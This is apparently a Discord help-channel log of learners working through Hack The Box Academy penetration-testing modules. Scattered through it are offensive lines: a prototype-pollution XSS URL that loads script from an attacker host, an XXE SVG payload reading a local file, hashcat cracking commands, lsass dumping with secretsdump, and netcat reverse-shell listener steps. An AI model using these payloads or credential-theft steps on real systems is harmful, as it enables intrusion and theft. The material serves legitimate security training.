For the SMB flag in Module 77 Section 726, I'm wondering why in the world the SMB connection is so unstable. You get the first couple of commands typed in just fine, then after about 30 seconds, everything you type takes 2 minutes to appear in the terminal, then after a minute or 2 beyond that, a NT_STATUS_INVALID_NETWORK_RESPONSE error occurs and the whole SMB connection just disconnects. Why is this?
I find myself repeatedly having to run:
while [ $? -ne 0 ]; do echo "" | sudo smbclient \\\\<target IP address>\\users; done
Why is the connection so fickle as to make this necessary?
Look further. You’re on the right track
Also don’t spoil the content
Ok i found it
Good job
Good, now again, why the unstable SMB connection in the module I'm working on?
could be the server, maybe try another region
I am writing a report for ANE; do I add the list of subdomains I exploited in the "Exploited hosts" section in the appendix?
Has anyone done Password attacks “Passwd, Shadow & Opasswd” section of the password hacking module recently?
This is driving me nuts. Feels like no matter what different rulelists I use to mutate the wordlist given in wordlists to crack the unshadowed shadow.bak file, nothing returned from hashcat
I'm in the attacking common services module on the easy assessment. I got a username from the smtp service. I am stuck tho. I have tried bruteforcing my way into ftp,rdp etc and nothing. I have been at it for awhile.. any hints to point me in the right direction?
lol...well ty i appreciate that
Conflicting information - forums say to use the resources, the module itself says rockyou, even in the history of this channel people say to use the password list given in resources and apply the given custom.rule
Unless you're referring to neon
yeah im talking about neon
but the custom rule should work
¯\_(ツ)_/¯
The mutated password list is the correct one yes
maybe u got the wrong hash format
The logic for module password cracking is this: 1. List in resources, 2. List you generate throughout the module, 3. List you find on a target, 4. rockyou
PS A:\oven\HACKERMAN\hashcat-6.2.6> ./hashcat.exe --force .\cpts\Password-Attacks\resources-original\password.list -r .\cpts\Password-Attacks\resources-original\custom.rule --stdout | sort -u > .\cpts\Password-Attacks\resources-original\password_mut.list
PS A:\oven\HACKERMAN\hashcat-6.2.6> ./hashcat.exe -m 1800 -a 0 .\cpts\Password-Attacks\unshadow.txt .\cpts\Password-Attacks\resources-original\password_mut.list -o .\cpts\Password-Attacks\unshadow.cracked
[....]
Session..........: hashcat
Status...........: Exhausted
maybe skill issue
Don't use force or ChickenMan will come get you
try taking the attack mode off
The module says to do it, but the actual developer says not to
regen'd without --force and removed -a 0
going to bash my head into my monitor
Did that work?
DM me the hash
yeah im sure that should work
likely pebcak
pm'd 😉
Hey so I'm doing the password attacks hard lab and I'm using dislocker to access the files however when I attempt to mount the drive I get this error using these commands
sudo mount -o /media/bitlocker/dislocker-file /media/bitlockermount
mount: /media/bitlockermount: can't find in /etc/fstab.
do I need to edit the /etc/fstab? I'm afraid that could mess with the machine if I do though?
i played it safe and transfered it to a windows vm
Nothing bad will happen if you add a mount entry to the file
But it did seem faster to mount it on Windows so that's what I did at the time
Interesting I didnt think of that
Yeah, I think it was just something like Disk Management - Attach VHD, done
in case anyone reads channel history and has the same issue:
my problem is that I am using Windows hashcat to be able to use my GPU without passthrough to Kali.
the issue is: hashcat ends up generating a wordlist based on the custom.rule list from the module resources in Windows with around 40k fewer lines.
I fixed this by generating the wordlist from the rules locally in Kali, transferring that wordlist to Windows, and cracking from Windows like normal.
You generally shouldn't mount unknown drives to your system
Iirc the password list should be ~94k long
@marble cypress sent you a dm if you dont mind
How is it determined/decided which modules etc. grant cubes?
Connection speed has improved somewhat, but I'm still running into this problem periodically. Just curious as to why Samba would ever be slow enough for this to be necessary.
Note the barrage of "NT_STATUS_IO_TIMEOUT" errors — shouldn't be happening, but it is. Why?
@cloud urchin ^
a timeout error is generally going to mean a network issue of some kind, but it could also be a region issue with htb. first troubleshoot your connectivity.
also make sure to wait a few mins after spawning the victim machine because it can take a few minutes to fully come online
try reading the section again
Probably trying to call it incorrectly
Also you don't need to escape the $ at the end I don't think
Or you can try wrapping it in quotes, if you're truly needing to connect to ipc
Well if I don't escape the $ at the end then Bash freaks out.
Single quotes*
Bad_network_name generally means it's not meant to be connected to
If this is the getting started module, you don't connect to IPC$
No, I know; was way off track trying to go down rabbit holes not knowing that the whole thing was white-box the whole time. I'm still, however, having to use shell loops to work around the NT_STATUS_IO_TIMEOUT problem which for whatever reason is still rearing its ugly head intermittently.
That's just a connection thing
¯\_(ツ)_/¯
Which can happen even in the pwnbox
Depending on server load
Yeah, PwnBox is what I've been in the whole time, and US-Academy-4 is one of the "recommended" connections with a low load. So still wondering what the problem is.
Eh recommended usually just means closest vpn endpoint to you, there's also different pwnbox regions
Ahhhhhhh, can someone help me with the "Introduction to the Windows Command Line" module, specifically the last question in the skills assessment section? I’ve tried several methods and attempted various users, but for some reason, none of the answers are being accepted.
Yeah, seems a lot of traffic in SoCal, but the load is also in the green. So still stuck.
Are you checking against the DC?
Iirc it states connect to the DC and find this info
(The domain controller IP was given earlier)
oh, I think that may be the problem
If you aren't connecting to the DC, you aren't gonna get the right answer 👍
has anyone completed Whitebox attacks? I'm stuck in the part for prototype pollution for DOM based xss, I've been at it for a few days now but I can't manage to figure it out.
What is the best coding app for html
You mean like best ide?
Well depends a lot on personal preference, but VSCode and Sublime text are two I use personally for coding in general
Thx i will try them out sorry new to coding and to this server
I cant buy modules
I cant send images and I cant create a post in #1024429874246590575
So im asking here
finally
I clicked a hundred times to buy it hahaha
Disable adblock, also to post in #1024429874246590575 you need to select a tag
am i going insane or is rockyou.txt no longer in the terminal
nvm it was saved as .gz that confused me for a sec
It usually is
As the list is very big
interesting. i last used it 4 months ago it wasnt zipped then. guess they changed it in that time
If you mean on pwnbox, maybe
Btw hashcat generally doesn't have issues reading from it zipped
Has anyone done Windows Privesc Pillaging section? I can't get the restic backups working for some reason and can't bypass the Access Denied
hi, my root flag for "Enumerate the Linux environment and look for interesting files that might contain sensitive data. Submit the flag as the answer." doesn't work.. (yes I removed all spaces, cleared web caches) but nothing works..
beginner here. a bit stuck on the flag for the public exploits page of the penetration tester path. I found the exploit I need to use but am struggling with the file path. maybe I'm getting the structure of it wrong, but everything I've tried returns no result
I feel like what I should be using as the path is literally stated on the website, but when I put that as the file path in the exploit it doesn't return any files
got it lol
way simpler than i thought it would be...
holy cow im blind. just went to submit the flag and realized it says the path in the question. 🤣
u could learn html by randomly scrolling w3schools and making dumb projects like me
why would you actually want to learn html?
Oh okay thx appreciate it
MODULE: Whitebox Attacks
SECTION: Client-Side Prototype Pollution
I'm really struggling with getting the admin user to load the /admin.php?promote=2 link. I can get the XSS, which I just hosted as a .js file with a Python HTTP server, but when I submit the link to the profile page, it never loads and I can never get the flag. I understand it's something with a link and /admin.php?promote=2 and I can get the XSS, but I'm unsure where to go from here since every time I submit the link it never works
My current payload for the xss is
||http://94.237.56.194:47879/profile.php?id=2&__proto__[src][]=http://10.10.15.150:1337/test.js||
, where test.js would be like alert(1)
However, if I submit the link for /admin.php?promote=2, it never works and I can't get it to load, even with my regular JS file.
@upper haven can I please get a hint? I've been stuck on this for days
This channel isn't for random questions, read and follow #welcome to access more of the server
MODULE: Password Attacks
SECTION: Credential Hunting in Linux
Examine the target and find out the password of the user Will. Then, submit the password as the answer.
Don't need help for this section but wonder how someone could solve this without using "HINT"? I was stuck here for a long time as I had planned not to use hints. The hint gives us additional background information about another user and their possible password for us to work on and I was wondering if it is possible to solve without using it? Does anyone know?
Hi y'all! I could use some help!
I'm stuck on the last two questions in IMAP/POP3 of the Footprinting module.
I've searched through Google, YouTube, Reddit, and the HTB forum. I cannot for the life of me find the correct command(s) needed to find the admin email address, and the IMAP server flag.
Please help 😩
Yeah some of them are impossible to do without the hint for some reason
Lots of brute forcing
1 fetch 1 body[]
The admin email is in the email sent to the compromised user
Chatgpt is really helpful in these situations
Ok, and where do I use that? OpenSSL? Telnet?
ChatGPT is looking really tempting because I've been stuck on this thing for four hours. None of the commands provided in the exercise work. And I've gotten very little to no help out of Google, YouTube, Reddit, and the HTB forums.
Yeah it helped me with some mssql commands
I just typed “How to get an email out of an imap message in telnet” and got the command
Interesting
I can't post screen shots here?
It's not entirely unknown, now is it, and it's a VM
I generated the user name list for H* and just provided firstname, lastname, special chars - yes, number - yes, and leet - yes for custom password list. I filtered out the ones that do not comply with the password policy. But I am still not able to get the correct login credentials.
Also, the remaining time keeps on increasing why?
Found it! 🙌🏽 it only took me half a day 😤
These bruteforcing modules feel more like luck than skill 😭
server-side-attack skill assessment
is it so simple to get the flag
maybe it is a bug
anyone who solved this
pls let me know
it's solvable
okay
"What AD User has a RID equal to Decimal 1170?"
Shouldn't I be able to convert this RID (1170) using cyberchef?
Module: Pivoting, Tunneling and Port Forwarding -> Dynamic Port Forwarding with SSH and SOCKS Tunneling
Hey all, did anyone else run into connectivity issues on the pivot host? I'm using a Kali VM. I'm able to setup the SOCKS tunnel but when running nmap (with proxychains) on 172.16.5.19, I can see the traffic being routed to the pivot host however on the pivot host it gives a serios of connection errors (same thing happens when trying to RDP with proxychains).
Can you provide a screenshot of the errors?
slight typo it should be 172.16.5.19 not 172.15.5.19
but I get the same error
@stark lark
they're the errors from nmap
Yes, but To Hex assumes a string. You want to use To Base for an integer.
Hmm what would the recipe look like?
Just To Base with 16 (hex) as Radix
What's appended to your etc/proxychains.conf?
Thanks!
Hello, i'm doing the footprinting module. I'm at the SMB part. I can't connect to smb to get the flag.txt , I use this command smbclient //ip/path and then it connects to my machine not the htb machine. Can someone help me please ?
I also have a /etc/proxychains4.conf but changing that didn't seem to make any difference
Maybe I'm wrong, but when using SOCKS during the module, wasn't port 1080 used? and 9050 for SSH port forward.
Ah maybe that's why. I'll double check the module.
Looks like it should be 9050 actually
You should be able to run smbclient -N -L //ip to find the shares and then smbclient //ip/share from memory, which share are you trying to connect to?
Can I dm you?
Yeah of course
Yeah, it's what I did but it connects to my machine
and it's asking for my password, not the machine password
Just checked on my end, have a look into SMB anonymous logins
I think it's covered in the course material
I'm trying to connect to sambashare
I'm gonna check
I don't want to give away the answer because I'm not sure if HTB will get annoyed but if you look up anonymous SMB logins it is an easy solution. There is a default way to login to SMB, if anonymous login is enabled. The password it is asking for is for SMB, not your computer.
okay yeah i found it, i have just restarted the machine and it worked
thanks for helping
np
Hey guys, im stuck on a module: Information Gathering - Web Edition Skill assessment
||I can't seem to find the hidden web directory "Admin" that the room is hinting at. I'm using this command:||
||```
feroxbuster --url=http://inlanefreight.htb:51557/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -t 64
```||
are there any free paths?
I'm working on the Intro to Windows Evasion. ThreatCheck to make Rubeus bypass AMSI. Looks like it's caught on bytes associated with 'mscoree.dll'. I attempted to find where this is in the program, but I don't see it. I'm not sure where to search or research next. Any assistance with this would be great.
DM! if still need help
This isn’t the place. That’s cheating and illegal
If you are only looking for cheats for your game, I suggest you find another server 🙂
No idea. But I do know Hack The Box isn’t the place
Then what is this
Professional platform where cyber security professional learn skills to use in their work.
Hello, i got stuck on Game Hacking Fundamentals - Skills Assessment
What flag is displayed when you successfully modify the Lives counter to a value greater than 5?
So I downloaded the game, and I found the lives address and changed it to 9, and at the bottom of the app a text appeared, but when I try to answer the question the answer is wrong.
If you're looking to download hacks, go somewhere else.
Oh lol wrong thing byee
Bye bye. Take care 🙂
It's actually funny, because he could learn how to do it, literally post above his is learning. But I don't think Jack has the patience.
indeed
The target is a docker container. Docker containers cannot reach out to your host, outgoing connections are blocked by a firewall. You cannot host the JS payload on your host but have to supply it in the URL
sent you a dm
All tier 0 modules are free, so some skill paths are too, like the Information Security Foundations path is free
that makes sense
thanks
Hello everyone
Is it better to use ports below 1024 for a listener or above? I've read that listening on ports below 1024 can help with firewalls/bypassing security measures, any downsides?
Hello, here is my issue
Question 1 : SSH into the server above with the provided credentials, and use the '-p xxxxxx' to specify the port shown above. Once you login, try to find a way to move to 'user2', to get the flag in '/home/user2/flag.txt'.
ssh [given user]@[given ip] -p [given port number of target IP]
sudo -l
sudo -su user2
cd ~
ls
cat flag.txt
I've got no problem here but for the second question : Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'.
I'm trying to escalate the privileges to root with the id_rsa key, but when I try to connect with ssh it still asks for a password.
What should I do ?
Are you telling SSH to use the key with -i <key file>?
Did you set the correct permissions on the key file?
yes i did "chmod 600"
Make sure you don't have any whitespace or extra characters in the file. You can see whether SSH is actually using the file by doing ssh -vvv -i <keyfile> <target> and verify the debugging messages
what do you mean? Who is the id_rsa key for?
Windows Privilege Escalation Skills Assessment - Part II question 3 i can't find that disabled user using mimikatz and i can't use secretsdump to extract hash from lsaaa.dmp any hints?
Look what i did :
copied the id rsa from user2, pasted it on my local machine. And tried ssh connection on my local "ssh root@localhost -v -i id_rsa"
why?
if the key is for user2 on a different box, SSH-ing to your own machine as root with that key is never going to work
What module and section is this from?
But I don't have any IP for user2, "root@user2 ip" would be more appropriate
I'm trying to find which CMS is used in the above lab and tried the curl command to see it in the header, but it didn't show up. Any clues?
user2 is on the same box as user1. You already have that IP
anybody did a game hacking module ?
And you found root's id_rsa, which means you can connect as root to the same box as you have been connecting to already
thanks alottt
it's working
can anyone help me in finding the XSS vulnerability in the Session Hijacking module? I'm literally stuck there, can't find any XSS vulnerability, though I made a listening port also
guys help me
Hello
in "https://academy.hackthebox.com/module/143/section/1490" first question I dont understand why that's answer is 7
when i search with ldapserach output is :
┌─[✗]─[htb-student@ea-attack01]─[/home/administrator]
└──╼ $ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength
forceLogoff: -9223372036854775808
lockoutDuration: -18000000000
lockOutObservationWindow: -18000000000
lockoutThreshold: 5
maxPwdAge: -9223372036854775808
minPwdAge: -864000000000
minPwdLength: 8
modifiedCountAtLastProm: 0
nextRid: 1002
pwdProperties: 1
Please can someone explain to me
it is in the material in the section
What I have to do now can u explain me pls ?
it is explained in the section
aa understand I just distracted
thanks
there isn't a module basics of sql injection
hello, https://academy.hackthebox.com/module/158/section/1426 I am stuck on this part, q2, port forwarding.
the RDP port is accessible and my port forward seems to work, but I can't open RDP
oh its working, thanks
oh, wdym by that? sudo changes that? i remember I had to use sudo with proxy chains before thats why I used it
thanks for your help
i am re-doing the Information Gathering Web edition module after the update. I notice there are new questions, but the answers of the previous module version are still there, so I cannot input the answer of the new questions. Any way around that ?
hey guys, I'm stuck at the Getting Started module knowledge check, I can't download the LinEnum.sh script on the target machine, I receive this error, do you guys know why?
Check the permissions for your pwd
I would guess that you don't have write permissions to /; you most likely can write it to /tmp or /dev/shm
oh im not mrb3n lol
hello everyone
do you also know what p means at the beginning when you do an ls -la? It's not a dir or file?
never saw it before
doing fuzzing vhosts on htb academy right now
stuck on a minor problem
😅
would be great if anyone can help out
it's a special kind of file - a fifo or named pipe
nvm found it ;]
yeah found it i have a last question, what can i do to have a root shell here? i have sudo perm on this file
many things
it's a bit overwhelming ^^ first time "hacking" a box
👍
Go to the site I’ve sent
it's easy one, check the website above
Search for php, and see what you can do with it
@tender nimbus just remember to use "sudo php ..."
it works but I get the same shell that I already had, and when I use sudo I receive this error
By default the environment variables do not persist when using sudo.
omg it was so simple
I was searching too far
it was just this to do, I thought I had to look at the shell and all that stuff
Doing the Attacking Web Applications with Ffuf module and I'm having problems with the final assessment question: One of the pages you will identify should say 'You don't have access!'. What is the full page URL?
I have the page and the full URL. But it doesn't work... I have tried removing the port number but to no success
In what format should I provide the answer?
NVM I got it
how can I report an error in the module?
I was doing Game Hacking Fundamentals - Skills Assessment
I managed to change lives to 23 and got a flag but when i enter the flag it is wrong answer.
What flag is displayed when you successfully modify the Lives counter to a value greater than 5?
So i skipped that and did the second question
What flag is displayed when you successfully modify the HiddenScore counter to a value greater than 200'000'000?
So i changed the value to 300000000 and got a flag, i entered the flag and it was correct.
So i was wondering whats going on ?
Maybe there is a (space) at the end of it, have you checked that?
It usually because of this issue
If it’s still didn’t work try contacting the support
No, no space, I even tried to copy-paste from Cheat Engine.
I found the string in the program, copy to clipboard and paste but its still wrong
Try contacting the support then
Where is the email or discord help ?
I am a bit lost
In the academy page u gonna find hack the box logo at the bottom right
Click on it and u can contact them
thank you, found it
Np anytime man
Figure it out?
no
still trying
Why can't you dump lsass? You should already have admin on the computer by question 3.
I am able to dump lsass but secretsdump won't work
"impacket-secretsdump lsass.dmp -o output.txt" is the command I use
RemoteOperations failed: encoding with 'idna' codec failed (UnicodeError: label empty or too long) this is error message
there are a few different ways to get the hashes when you have admin
there is another way
Hello
I need help with Web Fuzzing / Filtering Fuzzing Output. So I tried fuzzing directories and then fuzzing POST using
ffuf -u http://IP:PORT/post.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "y=FUZZ" -w /usr/share/seclists/Discovery/Web-Content/common.txt -v -mc all
With the port I was using I tried filtering by size and such, but all I get is "incorrect parameter y". Thanks for the help in advance
please tell me that way i really can't think of any other ways
There are a bunch of ways. https://book.hacktricks.xyz/windows-hardening/stealing-credentials
Bro I've been on the Footprinting path under the DNS module for 2 days straight. This thing is absofuckinglutely unreadable
thanks bro!!
you should open another listener (nc -lvnp PORT)
and replace RHOST with your VPN IP and RPORT with the other listener's port
and then execute
I wanted to ask, it's a machine but still, is it okay to brute force a password for more than 5 minutes?
Can someone help me with a fedora Linux problem😅
I installed fedora on a MacBook Air and I also installed the required drivers for wifi connectivity but recently after an update it stopped working. I looked into it and it appears the cpu is interrupting the process created by that driver.
I reinstalled the driver and nothing changed.
How do I connect to the HTB VPN?
Do you have a kali vm?
Then just use openvpn
I've got Arch
Openvpn
Hey man! If you still need help, ping me back. I can help! 🙂
you can always redo the lab using only powershell
Does someone know a note-taking app that I can use for my notes? I use OneNote for the moment but I don't really like it
Can I import my notebooks from OneNote or do I need to copy everything?
I dunno if you can import them from OneNote, best bet is to just copy them over
yes, you can
https://help.obsidian.md/import/onenote
yep something is going on. check #710108839063846964
😦
frens, what's wrong? Using rpivot with the Pivoting, Tunneling, and Port Forwarding module
supposed to run with python 2.7, how do I fix this?
@autumn pilot Thanks for your reply. But could you tell me if it is possible to connect to the machine with Pwnbox?
Hey everyone, right now I'm doing "The Live Engagement" from "Shells & Payloads"
I managed to get the rev shell via ||tomcat war file||. Now I wanted to try the second way ||via the status page. I uploaded the antak.aspx, but I can neither switch directories nor execute a PowerShell reverse shell command. || I get errors like "term '=' is not recognized."
Any idea why the antak web shell doesn't work here?
Can you try basic commands like hostname?
that works and gives me the hostname back
Sometimes webshells don't work; you can't change directories. I saw this in the AD module or somewhere else, don't remember. If you are trying to get the flag then you directly cat it with the full path, e.g. cat C:\user\administrator\desktop\flag.txt
are you trying to get a reverse shell from the webshell?
OK that works
Yes after I wasn't able to switch directories I tried to get a reverse shell to check if I can do more with that
If u want a reverse shell, may I DM you the way I did it in AD?
Sure, that would be great
ok
In case somebody runs into the same problem: ||Encoding the PowerShell command with base64 solved the issue||
Hello guys
I have a problem with the Java deobfuscation lesson
I found the flag but it doesn't accept it.
Are the PwnBoxes offline?
Hello everyone,
I hope you're all doing well.
I'm currently working on the third exercise of the module "https://academy.hackthebox.com/module/18/section/80" and I'm encountering some difficulties. Specifically, I'm trying to count the unique paths in the source code of the website inlanefreight.com using the following command:
curl -s https://www.inlanefreight.com | tr "?'" '"' | grep -Eo 'https?://www.inlanefreight.com[^"]+' | sort --unique | wc -l
This command returns 33 unique paths, but unfortunately, the answer appears to be incorrect. I would greatly appreciate it if someone could kindly assist me in identifying where I might be going wrong.
Thank you very much for your time and help.
Best regards,
Ronaldo Oliveira
You can't cd in a webshell
Hey guys, quick question: am I right that it's this IP address that I have to scan for the Lame box? Because I don't know why, but it doesn't seem to work. I already have the VPN connection set up etc. but it won't work
Also if I do a scan of all ports with -p- it gives me 0 open ports
Try the pwnbox
Wrong channel
I know, but I haven't received a response for 3 hours, so I know this channel is more active ^^
May I ask a question about netcat?
Doesn't make it the right channel to ask in
This channel is for discussion and help with academy modules
okay mb ^^
I mean... the php page tells you what param to use...
Then after it tells you what subdomain to start with... and then what directory
Tbh this skill assessment leads you to the next clue after each successful fuzz part
You don't know the domain to even begin to fuzz with until you crack past the parameter
But everything is in common.txt where they want you to fuzz from
Hello, I'm trying to download Parrot Security but I'm having some issues. I have the Samsung tablet/laptop
then you need to filter the output
Tablet? I wouldn't be trying on a tablet, unless you just mean it's a touchscreen laptop
wtf is this chatbot response
join the parrotsec discord and ask there, please provide more details beyond just "having some issues"
No, I'm just trying to help.
Sorry
if you read the channel description it tells you what it's about 😉
Thanks a lot.
I'm new to this so I want to make sure I'm not being rude.
it's ok to be helpful, but also be mindful of directing people to better places for requesting help
like #1024429874246590575 or the dedicated discord server of a distribution
stop doing onetwo.htb and just use the IP:PORT; also it'll be -fs to filter size, or -ac for autocalibration
to filter size, you'd use the most common output size that you're getting alongside the 200s
you also don't need to run ffuf with sudo
also http:// not http:/
Yeah, I have tried both, I seem to either get all or none
also it's not a post
it's a GET
http://ip:port/path/place.php?param=value
@mental hill since your posts are including the full name of the parameters and fuzzed values i'm gonna ask that you redact them
yes even behind spoiler text
as i've stated ad infinitum; spoiler text does nothing
Got it, sorry, and god dammit thank you
in future you can redact things with /a*/p* and those that have done it will know what you're referring to
or the parameter a*
remember how to mount nfs :)
nfs == networkfileshare
note it might restrict you to needing sudo to enumerate it
well... did you replace the [IP] with the target IP?
covering bases my guy
did you also specify the sharename?
yes
spoiler
but anyway
did you specify in your mount: IP:/sharename
I'm having trouble trying to install scrapy.
I used pip3 install scrapy
I also tried using sudo apt install scrapy
Any help, please?
Are you getting an error? Post a screenshot of what’s going on
sudo apt install python3-scrapy
I'm getting a lot of errors. Sorry, but for some reason I can't post a screenshot 😕
it worked because that's how you're meant to mount a share
because your account isn't linked ( #welcome )
just add --break-system-packages to your pip3 install command
also the error you get from the pip install explicitly tells you what to do
so
there's also that
reading error message challenge; difficulty: impossible
also you can't just "install scrapy" via apt, it's usually sudo apt install python3-[python module]
which is also told to you, in the error
Yes, and I did what the error message said, and still didn't work.
I'll try the --break
:) because I take it the error you got was something along the lines of "Externally managed environment"
Right, but it didn't mention the --break-system-packages part.
Anyway, it worked, thank you 🙏🏽
yes it did
i can guarantee you, it did
Cheese and crackers! I see it now! 🤦🏽♂️🤦🏽♂️🤦🏽♂️
most of the time errors will tell you what's wrong
Got it and thank you! just got done with it you are a lifesaver
now go back down the rabbit hole Alice (unless you already completed the skill assessment by now)
think of the Web Fuzzing Assessment as a checklist of what you learned
once you used a technique, you can generally disregard it (file extension, parameter, subdomain...)
so next steps will always be something you haven't achieved yet
Sometimes I go too fast when I'm nervous and stressing out 😒
there's no need to stress brother
you aren't timed on it
you get to the end result when you get there
what matters is you learned something on your journey there
the Windows module is much shorter than Linux, much easier too
because windows is probably more what you're used to
¯\_(ツ)_/¯
also Windows UX is generally catered towards more casual users
Can't wait to check out some of the other modules in the Security Foundations path, really excited to eventually do Intro to Network Traffic / Intro to Networking
Though I don't think I need the former, I've read 400 pages of TCP/IP
I appreciate you, boss. Thank you for being kind, patient, and sharing your knowledge with us newbies.
it's still a good brushup
network traffic will be more interesting imo
but intro to networking is very much just barebones basics
and easy +1
Ok, I don't know what I'm doing wrong. I'm trying to get the HTTP server software in the Skills Assessment.
I'm doing dig inlanefreight.htb MX and I'm getting nothing.
I found someone on Google that did the same thing, and he got the answer.
Help 😩
I have to ask, have you done the InfoSec path prior to pentester path ? This is a pretty basic question, giving the answer to you would not really help your understanding much.
Hello, I'm on the File Uploads module and kind of stuck with the Type Filter section labs. I got several webshells uploaded but couldn't get one that executes the code. All got blocked by my AV when running the GET request, please help
what module
Sorry, Information Gathering-Web Edition.
I used dig inlanefreight.htb MX, and it's giving me nothing.
u shouldn't need dig to get that information
the module goes over multiple ways to get software information on the webserver
ping is very high for all the regions to spawn the pwnbox:
When starting the pwnbox, screen is stuck on "Instance is starting" for quite some time.
I'm currently doing "File Upload Attacks - Limited File Upload". I try uploading an svg file and intercepting the traffic to Burp to insert this:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///flag.txt"> ]>
<svg>&xxe;</svg>
Unfortunately, I'm not successful in doing so. Can you point me in the right direction please? Thanks.
I've repeated all of the exercises within the module, and even some outside of it. I am not at all getting the http server software name powering inlanefreight.htb
WHOIS
nslookup
gobuster
Nikto
nmap
cURL
dig
I'm getting nothing.
What am I doing wrong?!
I also searched on YouTube, Google, Reddit, and the HTB Forum.
So...I'm bloo'y trying here😑
Maybe the wording threw u off a bit
It's just asking what webserver it's running
whatweb and curl should help
Right mate, but alas it yielded nothing. I submitted whatever information I got from either of the two, and my answers kept getting rejected.
cURL was basically blank 🤷🏽♂️
Same with whatweb.
I used inlanefreight.htb. When they didn't work, I used the IP address provided in the exercise.
And still...nothing
what options did u add to curl? it should be the first thing you see
and whatweb has the answer in blue
Oof, I already turned off my pc, mate. My brain is fried after spending all day hunting down whatever clues I can get my hands on.
But as I mentioned earlier, I truly made an earnest attempt to resolve the issue. But alas, I think I may have hit a nasty wall. Just looking for some clues here in Discord since I exhausted the other aforementioned avenues.
i feel that
reread the first paragraph in the vhost section and correlate it with your output
gl
I badly need help with this. Anyone?
I am not gonna skip this one, I'll stay on it for as long as I need to, even if it takes me days. But good lord how many times can I keep banging my head on my bloody door?! 😆😆😆
What do you recommend I do? I know you said both cURL and whatweb should've given me the answers.
But as I mentioned earlier, those two were blank. Like absolutely nothing that was of use.
Right, I'll try them both again later. I just wish I could submit my screenshots here. But for some reason I can't 😑
Someone said it's because I'm not connected. But where do I connect?
u can dm
Thanks, mate. I'll shoot you a DM a bit later. I have some running around to do that I put off because of this.
Cheers 🍻
run /verify
Have you tried ffuf for its vhost?
He just needs what type of webserver it's running
curl would probably do it
I need help please.
update /etc/hosts, do curl, you'll probably get web server software
I think he forgot to add the IP to /etc/hosts haha
that's my guess as well, if none of the tools they used were working
I just slapped in the ip from the lab and it worked
Can I ask questions regarding fuzzing with libfuzzer for the binary fuzzing module
I just got to that section too will tell you if I can solve it
yea, the server doesn't redirect to the vhost initially. if they're specifying vhost, it needs to be in /etc/hosts
Oh yeah I never deleted the entry
Also for that exercise any VHOST you found, you need to add it to /etc/hosts
else you're gonna be stuck on it forever
Under this module's "libFuzzer" section there are two code snippets given, one under the "libMDP" header and another under the "Setting Up a Harness" header. Am I correct to understand the first one is just a demo of how libMDP is used and the second is the actual mdp_fuzzer.cpp file used in fuzzing the parser function?
If you reset your target, don't forget to update your /etc/hosts
Yeah I doubt he forgot to do that but it’s possible
Thank you.
Make sure the content-type is correct; once the upload succeeds, try viewing the page source
Please help me. I have no idea
Is it normal that my rdp connection closes every 3 minutes?
That happened to me on the passwords attack module
I'm in the same module